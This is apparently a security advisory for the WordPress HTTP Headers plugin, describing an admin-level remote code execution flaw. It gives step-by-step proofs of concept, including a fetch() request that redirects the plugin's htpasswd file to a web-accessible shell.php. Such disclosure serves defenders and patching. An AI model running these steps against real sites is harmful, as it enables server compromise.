HTTP Headers < 1.18.11 - Admin+ Remote Code Execution

This plugin allows arbitrary data to be written to arbitrary files, leading to a Remote Code Execution vulnerability.

PoC

-– <= 1.18.10 PoC — 1. As an admin, visit http://vulnerable-site.tld/wp-admin/options-general.php?page=http-headers&amp;tab;=advanced, and paste the following in your browser’s prompt: await fetch(“/wp-admin/options.php”, { “credentials”: “include”, “headers”: { “Content-Type”: “application/x-www-form-urlencoded”, }, “body”: option_page=http-headers-mtd&action;=update&_wpnonce=${jQuery('#_wpnonce').attr('value')}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dhttp-headers%26tab%3Dadvanced&hh;_htaccess_path=%2Fvar%2Fwww%2Fhtml%2F.htaccess&hh;_user_ini_path=%2Fvar%2Fwww%2Fhtml%2F.user.ini&hh;_htpasswd_path=%2Fvar%2Fwww%2Fhtml%2Fshell.php&hh;_htdigest_path=%2Fvar%2Fwww%2Fhtml%2F.hh-htdigest&hh;_method=htaccess, “method”: “POST”, “mode”: “cors” }); 2. Navigate to http://vulnerable-site.tld/wp-admin/options-general.php?page=http-headers&amp;header;=www-authenticate 3. Ensure WWW-Authenticate is enabled, and fill the form with Username “” and Password as any value. 4. Navigate to Settings > HTTP Headers > Advanced settings and set the “Location of .hh-htpasswd” field to its previous value (this is only required on Apache-based servers in order to reset a rule in the .htaccess file). 5. Go to /shell.php and see the RCE text. -– Pre-1.18.8 PoC — 1. As an admin user within WP Admin, navigate to Settings > HTTP Headers > Advanced settings. 2. Change the “Location of .hh-htpasswd” field: update the file name to “shell.php” (e.g. /var/www/html/shell.php) 3. Navigate to Settings > HTTP Headers > Authentication. Click “Edit” to the right of “WWW-Authenticate”. 4. Ensure WWW-Authenticate is enabled, and fill the form with Username “” and Password as any value. 5. Navigate to Settings > HTTP Headers > Advanced settings and set the “Location of .hh-htpasswd” field to its previous value (this is only required on Apache-based servers in order to reset a rule in the .htaccess file). 6. Go to /shell.php and see the RCE text.